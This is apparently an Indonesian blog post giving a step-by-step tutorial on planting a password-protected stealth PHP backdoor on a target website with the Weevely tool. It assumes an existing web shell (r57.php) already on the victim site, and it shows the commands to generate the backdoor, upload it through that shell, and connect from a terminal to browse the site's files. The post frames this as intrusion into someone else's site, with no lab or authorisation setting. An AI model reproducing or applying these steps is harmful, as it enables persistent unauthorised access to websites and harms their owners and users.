syarat : punya shell di situs target ex: http://target.com/uploads/r57.php
kl yang belum punya silahkan dilihat di sini...
bagi pengguna backtrack dan blackbuntu ,weevely sudah ada ko...
tinggal jalanin aja..
Application >> pentest >> maintain access >> backdoors and rootkit >> weevely.
setelah itu kita buat backdoornya pake perintah.
./weevely -g -o <filepath> -p <pass>/home/jincorn/door.php >> tempat file backdoor
<filepatch> tempat simpan file backdoornya
<pass> password untuk backdoornya
jincorn >> passwornya
coba kita ck dl file backdoornya..
udah ada tu kan door.php
setelah itu kita upload backdoornya ke situs target melalui shell yang sudah kita siapkan... Oke..
sekarang tinggal akses aja backdoor kita dari terminal...
./weevely -t -u <url> -p <password>oke kita tes...
<url> situs target yang udah kita tanem backdoornya
<password> pass backdoor yg tadi kita buat
pake commad "ls aja..
tukan semua file yang ada di situs target kelihatan...
sekarang terserah kita..
kita sudah tanem stealth backdoor...
Credit
0 komentar:
Post a Comment